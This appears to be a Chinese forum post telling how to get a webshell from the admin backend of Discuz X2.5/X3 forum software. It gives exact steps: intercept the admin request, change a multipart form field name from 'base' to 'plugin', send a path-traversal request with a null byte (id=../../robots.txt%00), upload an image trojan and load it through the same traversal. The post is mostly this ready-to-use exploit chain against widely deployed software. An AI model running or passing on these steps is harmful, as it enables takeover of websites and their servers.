dz3.0/2.5 后台拿shell[Discuz 后台拿shell]

90_

上班后看到wooyun社区发布了一个discuz  x3后台拿shell的方法，随后t00ls的会员也测试了discuz x2.5的后台拿shell方法。
好蛋疼的是我测试居然没过，抓到的数据包和给出的案例不一样！！！
经过研究发现，步骤错了。。。。
原帖地址内容：
http://zone.wooyun.org/content/3894
用户 – 用户栏目 – 栏目分组 – 提交 – 抓包 (我就是在这步出错的，一定要提交，不然抓到的数据包不一样)

1. 
   
2. Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

复制代码

改为

1. 
   
2. Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

复制代码

访问

1. 
   
2. /home.php?mod=spacecp&id=../../robots.txt%0057

复制代码

利用:
原帖测试的是dz x3，我测试的是dz x2.5  无视gpc
*********************************************************************
1.首先进后台，抓个包

2.改包
将

1. 
   
2. Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

复制代码

改为

1. 
   
2. Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

复制代码

提交

3.提交过后访问

1. /home.php?mod=spacecp&id=../../robots.txt%00

复制代码

4.找个地方上传图片马

5.访问图片马

1. http://192.168.2.190//home.php?mod=spacecp&id=../../data/attachment/forum/201305/24/122111m1464cdtfkc0stt1.gif%00

复制代码